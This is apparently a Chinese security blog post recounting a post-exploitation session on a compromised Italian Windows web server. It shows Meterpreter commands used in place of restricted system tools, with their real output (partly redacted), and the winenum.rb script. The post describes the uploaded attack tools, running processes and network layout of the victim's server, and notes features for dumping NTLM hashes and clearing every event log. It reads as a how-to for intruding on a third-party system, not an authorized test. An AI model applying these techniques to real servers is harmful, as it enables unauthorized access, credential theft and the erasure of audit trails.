Date/time:2017年,在一台意大利Windows服务器时发现自己上传cmd.exe文件后只能执行set命令,而以下一些命令都执行不了,猜测应该是这些系统程序被管理员删除或降权了。进去以后发现确实是被降权了,但Administrators和SYSTEM权限下是可以执行的。

  1. whoaminetnetstattasklisttaskkillsysteminfoipconfigarpcscript...等

2.png

根据常规思路可以自己上传这些命令的系统程序到可读/写目录,然后执行命令即可。但笔者在渗透中常用到Metasploit,所以就讲下Meterpreter网络命令,也是因为运行了EXP、Lcx.exe等程序暂时无法在中国菜刀直接结束进程和删除文件。

注:使用Meterpreter时可以不用上传相关系统程序(C:\Windows\system32\)到可读/写目录中就能执行部分cmd命令,权限为:SERVIZIO DI RETE。Meterpreter对应的一些命令如下!

0x01 stdapi实战应用过程

stdapi简介:
stdapi是Meterpreter里的其中一个拓展,获取Meterpreter会话时默认就已经加载了,无需再手动加载,可通过load/use -l命令查看所有拓展。stdapi命令功能有:文件读写、上传下载、目录切换、截屏、摄像头、键盘记录、系统相关命令等。

  1. winenum.rb:/usr/share/metasploit-framework/scripts/meterpreter/winenum.rb
  2. Stdapi:/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/
  3. https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions/stdapi

Image 1.png

(1) getuid = whoami

  1. meterpreter > getuid
  2. Server username: NT AUTHORITY\SERVIZIO DI RETE

(2) kill = taskkill

  1. meterpreter > kill 3268
  2. Killing: 3268

(3) sysinfo = systeminfo

  1. meterpreter > sysinfo
  2. Computer : WEBBY01
  3. OS : Windows .NET Server (Build 3790, Service Pack 2).
  4. Architecture : x86
  5. System Language : it_IT
  6. Meterpreter : x86/win32

(4) arp = arp

  1. meterpreter > arp
  2. ARP cache
  3. =========
  4. IP address MAC address Interface
  5. ---------- ----------- ---------
  6. 10.10.10.190 00:0x:5a:11:21:69 65540
  7. 10.10.10.207 00:0x:29:ab:af:e6 65540
  8. 93.6*.1*8.1 00:2x:97:fe:71:e1 65539
  9. 93.*3.1*8.17 00:0x:29:b6:62:ff 65539

(5) ipconfig = ipconfig/ifconfig

  1. meterpreter > ifconfig
  2. Interface 1
  3. ============
  4. Name : MS TCP Loopback
  5. Hardware MAC : 00:00:00:00:00:00
  6. MTU : 1520
  7. IPv4 Address : 127.0.0.1
  8. Interface 65539
  9. ============
  10. Name : VMware Accelerated AMD PCNet Adapter #
  11. Hardware MAC : 00:0c:29:70:34:2b
  12. MTU : 1500
  13. IPv4 Address : 93.**.***.12
  14. IPv4 Netmask : 255.255.255.0
  15. IPv4 Address : 93.**.***.12
  16. IPv4 Netmask : 255.255.255.0
  17. Interface 65540
  18. ============
  19. Name : VMware Accelerated AMD PCNet Adapter
  20. Hardware MAC : 00:0c:29:70:34:21
  21. MTU : 1500
  22. IPv4 Address : 10.10.10.26
  23. IPv4 Netmask : 255.255.255.0

(6) netstat = netstat

  1. meterpreter > netstat -an
  2. Connection list
  3. ===============
  4. Proto Local address Remote address State User Inode PID/Program name
  5. ----- ------------- -------------- ----- ---- ----- ----------------
  6. tcp 0.0.0.0:21 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
  7. tcp 0.0.0.0:23 0.0.0.0:* LISTEN 0 0 1716/tlntsvr.exe
  8. tcp 0.0.0.0:25 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
  9. tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0 4/System
  10. tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 700/svchost.exe
  11. tcp 0.0.0.0:443 0.0.0.0:* LISTEN 0 0 4/System
  12. tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
  13. tcp 0.0.0.0:1025 0.0.0.0:* LISTEN 0 0 464/lsass.exe
  14. tcp 0.0.0.0:1026 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
  15. tcp 0.0.0.0:1027 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
  16. tcp 0.0.0.0:1028 0.0.0.0:* LISTEN 0 0 1284/inetinfo.exe
  17. tcp 0.0.0.0:1113 0.0.0.0:* LISTEN 0 0 1316/sqlservr.exe
  18. tcp 0.0.0.0:1433 0.0.0.0:* LISTEN 0 0 1316/sqlservr.exe
  19. tcp 0.0.0.0:3306 0.0.0.0:* LISTEN 0 0 1504/mysqld-nt.exe
  20. tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 2280/svchost.exe
  21. tcp 10.10.10.26:139 0.0.0.0:* LISTEN 0 0 4/System
  22. tcp 93.**.***.12:139 0.0.0.0:* LISTEN 0 0 4/System
  23. tcp 127.0.0.1:1031 0.0.0.0:* LISTEN 0 0 2380/alg.exe
  24. tcp 10.10.10.26:1433 10.10.10.26:2767 ESTABLISHED 0 0 1316/sqlservr.exe
  25. tcp 10.10.10.26:2773 10.10.10.26:1433 ESTABLISHED 0 0 2768/w3wp.exe
  26. ...SNIP...
  27. udp 0.0.0.0:4500 0.0.0.0:* 0 0 464/lsass.exe
  28. udp 0.0.0.0:500 0.0.0.0:* 0 0 464/lsass.exe
  29. udp 0.0.0.0:445 0.0.0.0:* 0 0 4/System
  30. udp 0.0.0.0:3456 0.0.0.0:* 0 0 1284/inetinfo.exe
  31. udp 10.10.10.26:138 0.0.0.0:* 0 0 4/System
  32. udp 10.10.10.26:137 0.0.0.0:* 0 0 4/System
  33. udp 10.10.10.26:123 0.0.0.0:* 0 0 792/svchost.exe
  34. udp 93.**.***.12:123 0.0.0.0:* 0 0 792/svchost.exe
  35. udp 93.**.***.12:138 0.0.0.0:* 0 0 4/System
  36. udp 93.**.***.12:137 0.0.0.0:* 0 0 4/System
  37. udp 93.**.***.12:123 0.0.0.0:* 0 0 792/svchost.exe
  38. udp 127.0.0.1:3456 0.0.0.0:* 0 0 1284/inetinfo.exe
  39. udp 127.0.0.1:123 0.0.0.0:* 0 0 792/svchost.exe
  40. udp 127.0.0.1:3626 0.0.0.0:* 0 0 4028/w3wp.exe
  41. ...SNIP...

(7) ps = tasklist

  1. meterpreter > ps
  2. Process List
  3. ============
  4. PID PPID Name Arch Session User Path
  5. --- ---- ---- ---- ------- ---- ----
  6. 0 0 [System Process] 4294967295
  7. 4 0 System 4294967295
  8. 332 4 smss.exe 4294967295
  9. 380 332 csrss.exe 4294967295
  10. 404 332 winlogon.exe 4294967295
  11. 452 404 services.exe 4294967295
  12. 464 404 lsass.exe 4294967295
  13. 620 452 svchost.exe 4294967295
  14. 956 452 spoolsv.exe 4294967295
  15. 996 452 msdtc.exe 4294967295
  16. 1152 452 cisvc.exe 4294967295
  17. 1184 3268 443.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\RECYCLER\443.exe
  18. 1212 452 svchost.exe 4294967295
  19. 1284 452 inetinfo.exe 4294967295
  20. 1316 452 sqlservr.exe 4294967295
  21. 1456 2652 TreeSize.exe 4294967295
  22. 1504 452 mysqld-nt.exe 4294967295
  23. 1548 452 svchost.exe 4294967295
  24. 1588 452 sqlwriter.exe 4294967295
  25. 1716 452 tlntsvr.exe 4294967295
  26. 1756 452 vmtoolsd.exe 4294967295
  27. 1796 3340 explorer.exe 4294967295
  28. 1892 452 svchost.exe 4294967295
  29. 1912 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
  30. 1960 452 svchost.exe 4294967295
  31. 2280 452 svchost.exe 4294967295
  32. 2380 452 alg.exe 4294967295
  33. 2596 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
  34. 2652 1796 TreeSize.exe 4294967295
  35. 2760 452 svchost.exe 4294967295
  36. 2768 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe
  37. 3084 1152 cidaemon.exe 4294967295
  38. 3216 3152 vmtoolsd.exe 4294967295
  39. 3228 3152 ctfmon.exe 4294967295
  40. 3236 3152 DesktopInfo.exe 4294967295
  41. 3260 1152 cidaemon.exe 4294967295
  42. 3268 4028 cmd.scr x86 0 C:\RECYCLER\cmd.scr
  43. 3340 3152 taskmgr.exe 4294967295
  44. 4028 1892 w3wp.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE c:\windows\system32\inetsrv\w3wp.exe

(8) run winenum.rb
https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/winenum.rb

  1. meterpreter > run winenum.rb
  2. [*] Running Windows Local Enumeration Meterpreter Script
  3. [*] New session on 93.**.***.12:1998...
  4. [*] Saving general report to C:/Users/magiccutts/.msf4/logs/scripts/winenum/WEBBY01_20150207.0233/WEBBY01_20150207.0233.txt
  5. [*] Output of each individual command is saved to C:/Users/magiccutts/.msf4/logs/scripts/winenum/WEBBY01_20150207.0233
  6. [*] Checking if WEBBY01 is a Virtual Machine ........
  7. [*] This is a VMware Workstation/Fusion Virtual Machine
  8. [*] UAC is Disabled
  9. [*] Running Command List ...
  10. [*] running command ipconfig /all
  11. [*] running command ipconfig /displaydns
  12. [*] running command arp -a
  13. [*] running command net view
  14. [*] running command netstat -nao
  15. [*] running command netstat -vb
  16. [*] running command netstat -ns
  17. [*] running command cmd.exe /c set
  18. [*] running command route print
  19. [*] running command net accounts
  20. [*] running command net session
  21. [*] running command net user
  22. [*] running command net localgroup
  23. [*] running command net localgroup administrators
  24. [*] running command net group administrators
  25. [*] running command net share
  26. [*] running command net group
  27. [*] running command net view /domain
  28. [*] running command tasklist /svc
  29. [*] running command netsh firewall show config
  30. [*] running command gpresult /SCOPE COMPUTER /Z
  31. [*] running command gpresult /SCOPE USER /Z
  32. [*] Running WMIC Commands ....
  33. [*] running command wmic useraccount list
  34. [*] running command wmic group list
  35. [*] running command wmic netlogin get name,lastlogon,badpasswordcount
  36. [*] running command wmic service list brief
  37. [*] running command wmic logicaldisk get description,filesystem,name,size
  38. [*] running command wmic volume list brief
  39. [*] running command wmic netclient list brief
  40. [*] running command wmic netuse get name,username,connectiontype,localname
  41. [*] running command wmic share get name,path
  42. [*] running command wmic nteventlog get path,filename,writeable
  43. [*] running command wmic startup list full
  44. [*] running command wmic product get name,version
  45. [*] running command wmic rdtoggle list
  46. [*] running command wmic qfe
  47. [*] Extracting software list from registry
  48. ...SNIP...

3.png

winenum.rb脚本功能:(有兴趣的可以自己看下代码做些小修改!)

  1. 检查目标机器是否为VMware虚拟机、UAC(用户帐户控制)Disabled/Enabled ?
  2. PID进程迁移(migrate)、执行列表中的DOSWMICNetsh命令,以字符串形式返回。
  3. incognito列出可用tokens(令牌)、获取系统NTLM(哈希)、导出目标机器注册表、提取注册表里的软件列表。
  4. 清除所有事件日志(securitysystemapplicationdirectory servicedns serverfile replication service)。

public.png